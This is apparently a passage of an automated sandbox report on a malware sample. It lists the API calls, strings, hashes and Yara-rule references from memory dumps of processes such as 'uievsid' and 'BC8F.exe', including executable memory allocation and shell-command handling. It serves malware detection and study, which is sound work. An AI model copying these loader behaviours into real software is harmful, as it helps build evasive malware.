, xrefs: 0043134D
lulugumiwitojijeponuyo, xrefs: 00431427

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: AllocLibraryLoadLocalProtectVirtual_strlen
String ID: $Bq $W$!$dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$jjj$jjj$kernel32.dll$lulugumiwitojijeponuyo$royakamexisezepucivapah$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
API String ID: 349918097-3902791245
Opcode ID: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
Instruction ID: 415c62a77951a744553a168a51a57c6a95c62745853e107deaa3f9e8edd1f5a1
Opcode Fuzzy Hash: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
Instruction Fuzzy Hash: F3A1E131940244AFE7109B61ED89FAF7B78FB89B05F10412AF645B66B0CB741884CF6D

Function 005D003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005D024D

Strings

cess, xrefs: 005D018D
kernel32.dll, xrefs: 005D008F, 005D0095

Memory Dump Source

Source File: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5d0000_uievsid.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: fc9b128c1f50d28fefb36c0545add9695854d6336b218cbceaeb3d9a397e2676
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7D526A74A01229DFDB64CF58C985BA8BBB1BF09314F1480DAE94DAB351DB30AE85DF14

Function 006C07B6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006C07DE
Module32First.KERNEL32(00000000,00000224), ref: 006C07FE

Memory Dump Source

Source File: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6ae000_uievsid.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: def5cf3c4f3580666af9225adb989df78b4d5330fc621664590a6bedca8f9a12
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AEF06231200710BBE7243BB9A88DFBB76EDEF49725F10052CE642915C0DAB0EC458A61

Function 005D0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005D0223,?,?), ref: 005D0E19
SetErrorMode.KERNELBASE(00000000,?,?,005D0223,?,?), ref: 005D0E1E

Memory Dump Source

Source File: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5d0000_uievsid.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: c5d6d6fa0513ea3056317b239f3eb2f6e5cae715dba88dd75ef451771bbf1679
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 47D0123114512877D7102A94DC09BCD7F1CDF05B62F008412FB0DD9180C770994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 006C0475 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006C04C6

Memory Dump Source

Source File: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6ae000_uievsid.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 191eb2deafd4c3ef59273a1b8304b638af137b4c18df169b14e6b98511b57a6a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 70113C79A00208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D771EA50DF90

Non-executed Functions

Function 00431EF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431F0A

Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E

std::_Xinvalid_argument.LIBCPMT ref: 00431F47

Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 0043240B
Part of subcall function 004323F6: __CxxThrowException@8.LIBCMT ref: 00432420
Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 00432431

_memmove.LIBCMT ref: 00431FA8

Strings

invalid string position, xrefs: 00431F05
string too long, xrefs: 00431F42

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
Instruction ID: 2cadb799d56146ba8edc6c72aff560a7796ad4882ddfea7e943b282292512433
Opcode Fuzzy Hash: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
Instruction Fuzzy Hash: 0331D9323042109BD7209E5CE980B6AF7A9EBA9764F20162FF151CB3A1D769DC4087A9

Function 0043538F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004353B1
__calloc_crt.LIBCMT ref: 004353CA

Strings

`3D, xrefs: 004353E1
5D, xrefs: 004353F6
p3D, xrefs: 00435403

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __calloc_crt
String ID: `3D$p3D$5D
API String ID: 3494438863-1679561808
Opcode ID: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
Instruction ID: de272e09e23d9250239db4a7490b72095702d82ebb5a40ea01cd9d0a8bb696a3
Opcode Fuzzy Hash: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
Instruction Fuzzy Hash: 6911E732708A105BE7288F2DBC5576523A1E7D9768F24523BE915CB2D0E7B8DCC2424D

Function 00439248 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00439254

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__amsg_exit.LIBCMT ref: 00439274
__lock.LIBCMT ref: 00439284
_free.LIBCMT ref: 004392B4

Strings

(;D, xrefs: 004392AB

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID: (;D
API String ID: 3170801528-2216469755
Opcode ID: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
Instruction ID: 152704ef30623c9238207a3cfdd3a47f7cc548f2c407fd24f81e6b70bdaadf34
Opcode Fuzzy Hash: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
Instruction Fuzzy Hash: 4A01E131D00A12B7DB21AF65840570FB7A0BF0DB56F11145BE800A3291C7BC6E41CBCD

Function 004380C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004380D5

Part of subcall function 00438030: ___BuildCatchObjectHelper.LIBCMT ref: 00438066

_UnwindNestedFrames.LIBCMT ref: 004380EC
___FrameUnwindToState.LIBCMT ref: 004380FA

Strings

csm, xrefs: 004380D1, 004380E6, 004380F9, 00438117, 00438127
csm, xrefs: 004380C4

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
Instruction ID: 130df07e853fa2f533784855c47a2f69c2e55324b64576559f26a633e08d5ed7
Opcode Fuzzy Hash: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
Instruction Fuzzy Hash: 17014B71000209BBDF226F51CC41EABBF6AFF0C394F00501ABC5814261DB3AE9B1DBA8

Function 00436C96 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 00436CAA
__init_pointers.LIBCMT ref: 00436D5C
__calloc_crt.LIBCMT ref: 00436DCA
__initptd.LIBCMT ref: 00436DEF

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
Instruction ID: 3999fe2ea24db576f7657d23c26465a461ec30c79b1a0224d1fb40ee8fa08d6d
Opcode Fuzzy Hash: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
Instruction Fuzzy Hash: 85314F79900711AADB10AF75ED0A6173AE0AB8F764B11913BE914936F0D7788841EF5C

Function 0043404F Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00434056

Part of subcall function 00436AD4: ___set_flsgetvalue.LIBCMT ref: 00436AE6
Part of subcall function 00436AD4: __calloc_crt.LIBCMT ref: 00436AFA
Part of subcall function 00436AD4: __initptd.LIBCMT ref: 00436B23

__calloc_crt.LIBCMT ref: 00434078
__get_sys_err_msg.LIBCMT ref: 00434096
_strcpy_s.LIBCMT ref: 0043409E
__invoke_watson.LIBCMT ref: 004340B3

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID:
API String ID: 788502912-0
Opcode ID: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
Instruction ID: 39280b0692534ef492391a93540d1e778240f8cc2ca39a1588eefa3c8cf7a6f0
Opcode Fuzzy Hash: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
Instruction Fuzzy Hash: 4FF0F63270421427D73439665D419EBB2BCCBCC728F11653FF705A3251D52DBC4142AD

Function 00437D15 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00437D3D

Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EA4
Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EB2

__getptd.LIBCMT ref: 00437D47

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00437D55
__getptd.LIBCMT ref: 00437D63
__getptd.LIBCMT ref: 00437D6E

Part of subcall function 00433F3B: __CallSettingFrame@12.LIBCMT ref: 00433F87

Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E4A
Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E58

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
Instruction ID: ed279d661dc42825c760b9fc98aca8d678b77b7f2585112291c896c5a2fb70ba
Opcode Fuzzy Hash: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
Instruction Fuzzy Hash: 3111D7B1C00209EFDF01EFA5C546BADBBB0FF08319F11906AF914A7251DB389A119F54

Function 00438FAC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00438FB8

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00438FCF
__amsg_exit.LIBCMT ref: 00438FDD
__lock.LIBCMT ref: 00438FED
__updatetlocinfoEx_nolock.LIBCMT ref: 00439001

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
Instruction ID: c55a09df3b52eddba3e6a3b5d6970d993694369ddcd95f606bc929f609295e5e
Opcode Fuzzy Hash: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
Instruction Fuzzy Hash: BCF02B32901710EBD7217F769403B0DB3A05F0C729F22620FF614A72D2CF6C2A408A5D

Function 00430E00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00430F7D

Strings

sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 00430EF1
, xrefs: 00430E62
yoyorohexumutuwasetebayuda, xrefs: 0043102E

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: _memset
String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
API String ID: 2102423945-822714830
Opcode ID: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
Instruction ID: a679fca73d2dda16af80176112bc37e6ab3a80d6958592b53a1f1885a25e40f3
Opcode Fuzzy Hash: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
Instruction Fuzzy Hash: B5713B75E40208AFEB14DF94DD8AB9DB7B4FB48701F108069E609BB290C7B46A40CF69

Function 0043C257 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0043C27D

Part of subcall function 0043C0A9: __fltout2.LIBCMT ref: 0043C0D4

__cftog_l.LIBCMT ref: 0043C2A3
__cftoe_l.LIBCMT ref: 0043C2D5

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: cfd293eb2920d9b94e498ee4755f1ba9df46740c805e4260226d03a9992dbe75
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 3B116D3640018AFBCF125E84CC81CEE3F22BF1D354F599456FA5968121C73AC9B2AB85

Function 00433913 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043392D

Part of subcall function 004340B9: __FF_MSGBANNER.LIBCMT ref: 004340D2
Part of subcall function 004340B9: __NMSG_WRITE.LIBCMT ref: 004340D9

std::exception::exception.LIBCMT ref: 00433962
std::exception::exception.LIBCMT ref: 0043397C
__CxxThrowException@8.LIBCMT ref: 0043398D

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
Instruction ID: 0c3675aeaf0011e457ff1f536f3ee95850dac15337a9e9b26eae673a39aafdee
Opcode Fuzzy Hash: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
Instruction Fuzzy Hash: A8F0267090020AAAEB04EF55DC06B9E37A86F49314F14506FE800A21A1CBB89F408B5C

Function 00431DF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431E65
_memmove.LIBCMT ref: 00431EB6

Part of subcall function 00431EF0: std::_Xinvalid_argument.LIBCPMT ref: 00431F0A

Strings

string too long, xrefs: 00431E60

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
Instruction ID: 9ff1e5a47eb56f93e73d824d9c6d53947e26d97076773c26e80e4cb96c3e41dc
Opcode Fuzzy Hash: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
Instruction Fuzzy Hash: 1C3109323006104BD7249E5DE98196BF3E9EB9A760F20162FF852C7761C776DC4087A8

Function 00431FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431FF6

Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E

_memmove.LIBCMT ref: 0043202F

Strings

invalid string position, xrefs: 00431FF1

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
Instruction ID: 6c0ae7a36627a0dfc6bceb10b4348391515713d79e935b59abef4bc461637986
Opcode Fuzzy Hash: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
Instruction Fuzzy Hash: F001DB313043108BD3299D5CEE8056AB7BAEB99714F34592FD291C7701D6F5EC46C798

Function 00437E3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00437E4A

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00437E58

Strings

csm, xrefs: 00437E66

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
Instruction ID: 301a8880f988272baa46338c306b3bf3724f51adcf8a0e5165469f776e4bde47
Opcode Fuzzy Hash: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
Instruction Fuzzy Hash: DF018FB480C2199ACF349F61C44266EB7F6AF18312F24A49FE48096351CB3DAD80CB68

Analysis Process: BC8F.exePID: 2032, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	23.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.8%
Total number of Nodes:	882
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF6AAB49224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158
synchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB4924D

Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493AB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493C0
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493EF

Part of subcall function 00007FF6AAB4968C: PeekNamedPipe.KERNELBASE ref: 00007FF6AAB496B8

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB49421
GetExitCodeProcess.KERNELBASE ref: 00007FF6AAB49460

Strings

& echo , xrefs: 00007FF6AAB492BF

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
String ID: & echo
API String ID: 2711250446-3491486023
Opcode ID: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
Instruction ID: f62bdc682ff25e794b630a2abd1abcc0a4b81d4813ab5be793b1b3aa1f0a9da8
Opcode Fuzzy Hash: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
Instruction Fuzzy Hash: 11512225B0A642CBEE20DB52E5552BA6391FF87B80F4484B3DA4EC7B95DE3DE446C340

